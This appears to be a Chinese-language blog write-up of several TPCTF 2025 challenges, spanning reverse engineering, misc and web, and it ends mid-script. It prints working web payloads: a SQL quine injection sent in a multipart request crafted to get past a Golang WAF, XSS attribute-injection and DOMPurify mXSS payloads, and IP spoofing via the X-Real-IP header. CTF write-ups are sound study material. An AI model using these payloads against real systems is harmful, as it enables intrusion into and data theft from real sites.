Logo
Overview

TPCTF 2025 部分题解

March 10, 2025
技术 题解 CTF

update. 图片炸了,需要完整体验请访问公众号文章

mp.weixin.qq.com
mp.weixin.qq.com
Favicon of the bookmark site
https://mp.weixin.qq.com

re linuxpdf

跑了一下发现程序在root/files/00000000000000a9。

直接文本打开pdf找到第26行(?应该是,有一大坨base64

取出来找文件,base64→ zlib 解压得到binary。 

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

md5

改的,参数不一样?

貌似直接gdb调试,打表一下就行…我没用户态qemu啊

怎么直接调用函数啊,貌似他表里面没有这几个函数怎么办。

然后爆破。 

from hashlib import md5

r = """38f88a3bc570210f8a8d95585b46b065
83055ae80cdc8bd59378b8628d733fcb
fa7daffbd7acec13b0695d935a04bc0f
c29cc0fd3801c7fdd315c782999bd4cb
2ba2d01af12d9be31a2b44323c1a4f47
ddeebaf002527a9ead78bd16684573cc
bf95b89934a1b555e1090fecdfd3da9f
b6422c30b02938535f8e648d60a87b94
08c1b76643af8dd50cb06d7fdd3cf8ed
42d69719f97088f06540f412dc1706fb
a1f23da61615400e7bd9ea72d63567eb
4e246f0a5dd3ce59465ff3d02ec4f984
b8cf25f963e8e9f4c3fdda34f6f01a35
2d98d820835c75a9f981ad4db826bf8e
702ead08a3dd56b3134c7c3841a652aa
d2d557b613662b92f399d612fb91591e
e4422b6320ed989e7e3cb97f369cba38
71803586c67059dda32525ce844c5079
83b371801d0ade07b5c4f51e8c6215e2
b0d1b4885bc2fdc5a665266924486c5f
792c9e7f05c407c56f3bec4ca7e5c171
3855e5a5bbc1cbe18a6eab5dd97c063c
886d45e0451bbba7c0341fe90a954f34
3a437cbe6591ea34896425856eae7b65
34304967a067308a76701f05c0668551
d6af7c4fedcf2b6777df8e83c932f883
df88931e7eefdfcc2bb80d4a4f5710fb
cb0fc813755a45ce5984bfba15847c1e""".split()

for i in range(32, 127):
    for j in range(32, 127):
        if md5((chr(i) + chr(j)).encode()).hexdigest() == r[-1]:
            print(chr(i) + chr(j))
            flag = chr(i) + chr(j)

for j in range(26, -1, -1):
    for i in range(32, 127):
        if md5((chr(i) + flag).encode()).hexdigest() == r[j]:
            flag = chr(i) + flag
            print(flag)
            break

print(flag)

re portable

貌似逻辑在这一坨,

401894空函数,433a2b也是空的,主要内容在407f30。

看到一坨xor,貌似有了。

拿出来丢到cyberchef里,呃呃呃

misc raenil

分离帧,找几张明显点的图片,找二维码标志位然后还原 

# from PIL import Image
# gif = Image.open("raenil.gif")

# for i in range(0, gif.n_frames):
#     gif.seek(i)
#     gif.save(f"output/raenil_{i}.png")


import cv2
import numpy as np

image = cv2.imread('output/raenil_14.png')

pts1 = np.float32([[240,696],[269,766],[269,792],[241,743]]) # 17
delta_x = 500
delta_y = 100
size = 100
pts2 = np.float32([[delta_x, delta_y], [size + delta_x, delta_y], [size + delta_x, size + delta_y], [delta_x, size + delta_y]])

matrix = cv2.getPerspectiveTransform(pts1, pts2)

warped = cv2.warpPerspective(image, matrix, (1000,1000))

cv2.imwrite('warped.png', warped)

就在这几张图附近找找能找到剩下的部分内容,丢进qrazybox就好了

web baby layout

带出来就好了

web supersqli

python和golang解析form-data参数时如果同时出现filename,golang会跳过,可以绕过第一层golang的waf。

看了下sql数据库,没东西。貌似是个quine注入?保证输入内容和语句内容相同。

记一次Quino注入学习
nakaii.top
Favicon of the bookmark site
https://nakaii.top

问了魔法出来了这个 

1' union select 1,2,replace(replace('1" union select 1,2,replace(replace(".",char(34),char(39)),char(46),".") || "',char(34),char(39)),char(46),'1" union select 1,2,replace(replace(".",char(34),char(39)),char(46),".") || "') || '
POST /flag/ HTTP/1.1
Host: 1.95.159.113
Pragma: no-cache
Cache-Control: no-cache
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8
sec-gpc: 1
Content-Length: 535
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryDNYMxqkDehWaJWBf
Connection: close

------WebKitFormBoundaryDNYMxqkDehWaJWBf
Content-Disposition: form-data; name="username"

admin
------WebKitFormBoundaryDNYMxqkDehWaJWBf
Content-Disposition: form-data; name="huh";filename="1234"
Content-Disposition: form-data; name="password"

1' union select 1,2,replace(replace('1" union select 1,2,replace(replace(".",char(34),char(39)),char(46),".") || "',char(34),char(39)),char(46),'1" union select 1,2,replace(replace(".",char(34),char(39)),char(46),".") || "') || '
------WebKitFormBoundaryDNYMxqkDehWaJWBf--

web safe layout

根据前一题我们知道,关键就是把{content}塞到attribute里面。可以尝试不同的tag和attribute的组合,通过type定义进行爆破。

发现aria-和data-开头的attribute没有被过滤掉。和上一题一样构造即可。 

<img data-1234="{{content}}" />
1" src="" onerror="alert(1)

web safe layout revenge

附件密码:TPCTF{D0_n07_M0D1FY_7h3_0U7PU7_Af73R_H7mL_5aN171z1n9}

这题把data-和aria-给过滤了。但是思路应该是一样的? 

- Web: <http://1.95.61.75:3000>
- Admin bot: <http://1.95.61.75:1337>
Exploring the DOMPurify library: Hunting for Misconfigurations (2/2). Tags:Article - Article - Web - mXSS
mizu.re
Favicon of the bookmark site
https://mizu.re
x<style><{{content}}/style><{{content}}img src=x onerror=alert()></style>
""

把content替换成“”,就是正常标签。

misc nanonymous spam

逆天脑洞题

发现不同ip地址得到的用户名不同,因此怀疑通过用户名反向得到ip地址。

尝试更改nginx识别到的ip,使用X-Fowarded-For发现无法改变,使用X-Real-IP发现可以改变。

通过fuzz,发现稍微更改ip,用户名不会发生很大的变化,因此怀疑ip是循环产生的。通过试验,发现大概为a+b*103+c*103*513+d*103*513*313这样,因此可以通过用户名反推地址。

通过逐位爆破得到了循环列表(改变最后一位似乎会随机改变位置,懒得爆出列表,所以直接爆破得了)

得到的ip转字符就是flag 

import requests,string,socket,struct
s=requests.Session()
a=['Wim', 'Het', 'Fau', 'Ria', 'Dio', 'God', 'Man', 'Lim', 'Fap', 'Bar', 'Sot', 'Uae', 'Faq', 'Gum', 'Doe', 'Kay', 'Vol', 'Bic', 'Ren', 'Sox', 'Ral', 'Pii', 'Fol', 'Noo', 'Wes', 
'Law', 'Pic', 'Zig', 'Ric', 'Tad', 'Pav', 'Loo', 'Tea', 'Koh', 'Fia', 'Rep', 'Soa', 'Gog', 'Rim', 'Nec', 'Jun', 'Sus', 'Roh', 'Sac', 'Diy', 'Gin', 'Gul', 'Via', 'Tec', 'Mah', 'Rus', 'Cal', 'Wat', 'Mes', 'Pam', 'Sav', 'Luz', 'Lac', 'Jud', 'Lop', 'Tub', 'Lia', 'Kip', 'Nau', 'Loa', 'Roa', 'Dos', 'Nor', 'Jaz', 'Fim', 'Boo', 'Pad', 'Duo', 'Min', 'Vis', 'Hux', 'Cue', 'Soc', 'Caw', 'Rig', 'Wod', 'Pag', 'Tak', 'Cag', 'Coe', 'Lev', 'Ted', 'Vax', 'Peo', 'Uic', 'Cus', 'Huh', 'Rub', 'Gia', 'Raf', 'Bed', 'Pei', 'Sig', 'Pur', 'Qin', 'Dai', 'Deb', 'Pof', 'Neg', 'Tol', 'Lux', 'Jus', 'Uah', 'Que', 'Noe', 'Lov', 'Zee', 'Con', 'Fey', 'Soi', 'Tex', 'Pin', 'Kap', 'Sal', 'Luo', 'Tim', 'Mid', 'Daw', 'Had', 'Gam', 'Jul', 'Jie', 'Wol', 'Mon', 'Roc', 'Rel', 'Bas', 'Nou', 'Reo', 'Mar', 'Dao', 'Niu', 'Kev', 'Dee', 'Wip', 'Coc', 'Fes', 'Rat', 'Dig', 'Teu', 'Mob', 'Mae', 'Car', 'Tux', 'Dew', 'Xue', 'Poi', 'Sit', 'Xin', 'Per', 'Mos', 'Top', 'Gab', 'Yin', 'Loi', 'Jay', 'Moi', 'Yeo', 'Day', 'Dic', 'Haq', 'Dak', 'Mer', 'Wii', 'Pix', 'Fag', 'Dog', 'Por', 'Nib', 'Hog', 'Huw', 'Voc', 'Hob', 'Zep', 'Neo', 'Com', 'Seo', 'Cur', 'Mow', 'Reb', 'Jim', 'Noc', 'Big', 'Fin', 'Sek', 'Fav', 'Niv', 'Pom', 'Pes', 'Ker', 'Yao', 'Coq', 'Tif', 'Gem', 'Cel', 'Zit', 
'Toc', 'Jet', 'Vow', 'Lon', 'Rev', 'Joi', 'Jem', 'Wad', 'Bom', 'Tar', 'Pua', 'Rao', 'Bio', 'For', 'Dec', 'Win', 'See', 'Pup', 'Mea', 'Fam', 'Muh', 'Doo', 'Moh', 'Sam', 'Maw', 'Tog', 'Moe', 'Tin', 'Hur', 'Won', 'Lox', 'Poa', 'Dun', 'Run', 'Bil', 'Vip', 'Viv', 'Del', 'Nae', 'Zip', 'Roo', 'Sum', 'Leh', 'Lam', 'Yoo', 'Yip', 'Tow', 'Pil', 'Nab', 'Goi', 'Gar', 'Qua', 'Cor', 'Hav', 'Let', 'Ree', 'Set', 'Lee', 'Cef', 'Jam', 'Fal', 'Daa', 'Put', 'Num', 'Vod', 'Tis', 'Cad', 'Mot', 'Rit', 'Lex', 'Nav', 'Sia', 'Lip', 'Nox', 'Raj', 'Pie', 'Hel', 'Bam', 'Fed', 'Los', 'Fax', 'Neh', 'Jag', 'Sec', 'Jap', 'Sun', 'Cea', 'Jug', 'Sis', 'Cut', 'Fit', 'Fox', 'Bum', 'Joh', 'Lag', 'Fic', 'Sae', 'Gaz', 'Yuh', 'Hee', 'Fae', 'Caf', 'Nag', 'Bay', 'Ray', 'Log', 'Dim', 'Bag', 'Gap', 'San', 'Sup', 'Kuo', 'Wav', 'Suh', 'Kal', 'Tom', 'Ret', 'Seb', 'Wil', 'Jen', 'Haz', 'Cum', 'Xiv', 'Pon', 'Cod', 'Kit', 'Biz', 'Gag', 'Fen', 'Leg', 'Uid', 'Bod', 'Peg', 'Fur', 'Pip', 'Vid', 'Ter', 'Mol', 'Yor', 'Tek', 'Koo', 'Sui', 'Gis', 'Cia', 'Jig', 'Nad', 'Sin', 'Wop', 'Hou', 'Xii', 'Mim', 'Naa', 'Nia', 'Fai', 'Cat', 'Mio', 'Vee', 'Sew', 'Pal', 'Bub', 'Lis', 'Cac', 'Bid', 'Pah', 'Dip', 'Goy', 'Rum', 'Hoc', 'Viz', 'Fog', 'Tax', 'Kin', 'Req', 'Kik', 'Coa', 'Meh', 
'Mum', 'Lap', 'Mov', 'Pir', 'Bop', 'Der', 'Dag', 'Lei', 'Jit', 'Tod', 'Far', 'Tig', 'Tae', 'Ten', 'Toe', 'Sep', 'Mac', 'Hua', 'Vik', 'Piu', 'Rar', 'Hut', 'New', 'Pap', 'Hid', 'Xia', 'Hug', 'Rox', 'Rey', 'Meg', 'Zak', 'Uas', 'Dug', 'Bes', 'Ton', 'Lad', 'Hus', 'Lew', 'Jiu', 'Pub', 'Buy', 'Bet', 'Nog', 'Yak', 'Bau', 'Qol', 'Yet', 'Dor', 'Buh', 'Baz', 'Kat', 'Fei', 'Kon', 'Nuh', 'Noa', 'Cap', 'Cil', 'Tan', 'Jed', 'Dur', 'Bol', 'Sux', 'Gov', 'Dev', 'Teh', 'Bob', 'Bal', 'Pep', 'Hah', 'Res', 'Cai', 'Gas', 'Qiu', 'Wiz', 'Pis', 'Heh', 'Dil', 'Yer', 'Gon', 'Nis', 'Fiu', 'Ber', 'Gan', 'Bak', 'Fud', 'Cog', 'Zim', 'Doa', 'Bos', 'Hen', 'Hes', 'Dub', 'Web', 'Lol', 'Zoo', 'Vag', 'Lep', 'Vin', 'Cep', 'Sow', 'Naw', 'Mee', 'Vir', 'Jae', 'Lic', 'Gah', 'Wax', 'Zap', 'Bur', 'Civ', 'Tag', 'Led', 'Boe', 'Cin', 'You', 'Daf', 'Beg', 'Xan', 'Wix', 'Nun', 'Yap', 'Bai', 'Cox', 'Sur', 'Fet', 'Moj', 'Lau', 'Dis', 'Mat', 'Rid', 'Mal', 'Ris', 'Uis', 'Hib', 'Vie', 'But']
b=['Nod', 'Tap', 'Liz', 'Mel', 'Fig', 'Rif', 'Rip', 'Pud', 'Foo', 'Haw', 'Wef', 'Kel', 'Gat', 'Hod', 'Mom', 'Lin', 'Fez', 'Rua', 'Fay', 'Pat', 'Ned', 'Taz', 'Sid', 'Mic', 'Nom', 
'Hab', 'Rug', 'Men', 'Nok', 'Fun', 'Pox', 'Red', 'Jah', 'Tet', 'Hip', 'Tem', 'Bad', 'Mir', 'Taj', 'Maf', 'Rac', 'Zia', 'Hea', 'Fis', 'Dem', 'Bim', 'Gow', 'Hub', 'Job', 'Nex', 'Jas', 'Lie', 'Sim', 'Poc', 'Ran', 'Voa', 'Gig', 'Jes', 'Nie', 'Lal', 'Lek', 'Pen', 'Cos', 'Col', 'Nao', 'Mop', 'Bac', 'Cis', 'Mor', 'Vim', 'Ceo', 'Gic', 'Mii', 'Dep', 'Len', 'Few', 'Lob', 'Lea', 'Bec', 'Mui', 'Pec', 'Mab', 'Her', 'Tas', 'Tui', 'Kun', 'Vic', 'Too', 'Woe', 'Uav', 'Dam', 'Jin', 'Kaz', 'Yew', 'Cid', 'Jaw', 'Hay', 'Gib', 'Mis', 'Til', 'Six', 'Bot', 'Guo']
c=['Ser', 'Dea', 'Jac', 'Way', 'Cio', 'Tie', 'Tun', 'Goa', 'Sap', 'Fan', 'Jor', 'Pit', 'Gor', 'Son', 'Mun', 'Dan', 'Veg', 'Wel', 'Sev', 'Jeb', 'Gio', 'Ceu', 'Bib', 'Cif', 'Bug', 
'Zan', 'Mec', 'Rob', 'Lao', 'Hew', 'Quo', 'Hor', 'Foe', 'Mak', 'Hol', 'Fil', 'Cam', 'Nur', 'Vet', 'Yea', 'Yup', 'Lot', 'Jab', 'Goo', 'Soy', 'Pay', 'Hoe', 'Dud', 'Qos', 'Boa', 'Ceb', 'Lug', 'Nic', 'Rai', 'Nap', 'Sem', 'Rue', 'Bah', 'Sez', 'Jib', 'Ual', 'Mus', 'Cip', 'Cir', 'Yan', 'Div', 'Bor', 'War', 'Don', 'Tug', 'Tuk', 'Maj', 'Hae', 'Rui', 'Git', 'Gil', 'Lab', 'Med', 'Mag', 'Dui', 'Ruv', 'Raw', 'Sol', 'Foy', 'Sib', 'Sub', 'Moz', 'Ras', 'Mil', 'Rem', 'Nix', 'Dom', 'Ban', 'Zeb', 'Woo', 'Pus', 'Mau', 'Boi', 'Ped', 'Kee', 'Pop', 'Mix', 'Wai', 'Gun', 'Ley', 'Cee', 'Bok', 'Fao', 'Sul', 'Zac', 'Siu', 'Jan', 'Sai', 'Ged', 'Pau', 'Cop', 'Les', 'Suu', 'Dir', 'Var', 'Wap', 'Tai', 'Wah', 'Rei', 'Pas', 'Bat', 'Cas', 'Fad', 'Joe', 'Nir', 'Fem', 'Hai', 'Tal', 'Wea', 'Rok', 'Hoa', 'Goh', 'Hof', 'Nos', 'Roy', 'Nem', 'Bel', 'Yui', 'Wor', 'Neb', 'Tot', 'Luv', 'Yun', 'Lil', 'Doc', 'Lai', 'Hem', 'Kew', 'Lay', 'Nik', 'Gus', 'Hoh', 'Fix', 'Cup', 'Fer', 'Deo', 'Coy', 'Jer', 'Luc', 'Gif', 'Cou', 'Dob', 'Dow', 'Hum', 'Hom', 'Nan', 'Dot', 'Den', 'Yeh', 'Ces', 'Jak', 'Nei', 'Rag', 'Dar', 'Pun', 'Dex', 'Gee', 'Nes', 'Mit', 'Fos', 'Sed', 'Pac', 'Cic', 'Toi', 'Raz', 'Tok', 'Did', 'Rik', 'Hit', 'Kam', 'Hiv', 'Jut', 'Tee', 'Pod', 'Gir', 'Sax', 
'Hat', 'Dab', 'Nai', 'Jez', 'Was', 'Bon', 'Kid', 'Him', 'Tia', 'Bin', 'Wep', 'Dup', 'Yue', 'Maa', 'Hao', 'Suv', 'Ken', 'Mod', 'Kan', 'Moc', 'Cow', 'Sex', 'Ben', 'Deg', 'Gaf', 'Yaw', 'Luk', 'Faa', 'Bow', 'Ror', 'Bee', 'Cob', 'Loy', 'Row', 'Det', 'Nut', 'Rah', 'Coi', 'Rap', 'Def', 'Hie', 'Tic', 'Wis', 'Mew', 'Dav', 'Sir', 'Zoe', 'Zin', 'Uac', 'Rab', 'Yen', 'Sip', 'Nip', 'Bir', 'Pak', 'Kar', 'Gen', 'Kea', 'Sor', 'Lod', 'Fas', 'Sif', 'Zag', 'Rea', 'Wed', 'Vex', 'Lem', 'Sob', 'Sue', 'Lar', 'Rav', 'Sou', 'Bev', 'Kek', 'Kol', 'Rae', 'Map', 'Dah', 'Pee', 'Tam', 'Loc', 'Boc', 'Coz', 'Ful', 'Paz', 'Hop', 'Bui', 'Ref', 'Coo', 'Rez', 'Seq', 'Lou', 'Hon', 'Leo', 'Bis', 'Dia', 'Hui', 'Mai', 'Pez', 'Boy', 'Rog', 'Dac', 'Tut', 'Rut', 'Cuz', 'Now', 'Nii', 'Yas', 'Doj', 'Saw', 'Bex', 'Fom']
todo=['VicCouNeaGas', 'DemHohBojWod', 'PowFitGuoRut', 'VetTasBesDae', 'FasLiuTasJoi', 'DevRecWoeDia', 'BogHubSorHad', 'BagLibYupSix', 'MowPetBecZan', 'LonRecRipLuk', 'KarYapTajGot',
 'TiaLiuFayDic', 'VizDivCitBot', 'LeaLatReaSac', 'FasLiuVicToc', 'KunSadMerMun', 'LemLiuGuoReq']
def int_to_ip(ip_int):
    return socket.inet_ntoa(struct.pack("!I", ip_int))
def split_string(s):
    return [s[i:i+3] for i in range(0, len(s), 3)]
flag=''
for j in todo:
    p=split_string(j)
    for i in p:
        if i in a:
            aa=a.index(i)
        if i in b:
            bb=b.index(i)
        if i in c:
            cc=c.index(i)
